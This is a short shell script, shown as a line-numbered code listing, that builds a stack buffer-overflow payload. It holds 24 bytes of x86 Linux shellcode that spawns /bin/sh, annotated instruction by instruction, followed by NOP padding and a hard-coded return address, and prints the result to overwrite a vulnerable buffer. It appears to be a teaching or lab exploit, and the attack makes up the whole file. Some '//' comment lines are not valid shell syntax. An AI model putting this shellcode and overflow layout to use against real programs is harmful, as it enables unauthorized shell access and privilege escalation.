|
27
|
1 |
#!/bin/sh
|
|
|
2 |
|
|
|
3 |
// shellscript that overwrites the buffer with
|
|
|
4 |
// some payload for opening a shell (the payload
|
|
|
5 |
// cannot contain any \x00)
|
|
|
6 |
|
|
|
7 |
|
|
|
8 |
shellcode="\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80"
|
|
|
9 |
|
|
|
10 |
# 24 bytes of shellcode
|
|
|
11 |
|
|
|
12 |
# "\x31\xc0" // xorl %eax,%eax
|
|
|
13 |
# "\x50" // pushl %eax
|
|
|
14 |
# "\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e
|
|
|
15 |
# "\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f
|
|
|
16 |
# "\x89\xe3" // movl %esp,%ebx
|
|
|
17 |
# "\x99" // cltd
|
|
|
18 |
# "\x52" // pushl %edx
|
|
|
19 |
# "\x53" // pushl %ebx
|
|
|
20 |
# "\x89\xe1" // movl %esp,%ecx
|
|
|
21 |
# "\xb0\x0b" // movb $0xb,%al
|
|
|
22 |
# "\xcd\x80" // int $0x80
|
|
|
23 |
|
|
|
24 |
padding=`perl -e 'print "\x90" x 80'`
|
|
|
25 |
|
|
|
26 |
// need s correct address in order to run
|
|
|
27 |
printf $shellcode$padding"\xe8\xf8\xff\xbf\x00\x00\x00\x00"
|
|
|
28 |
|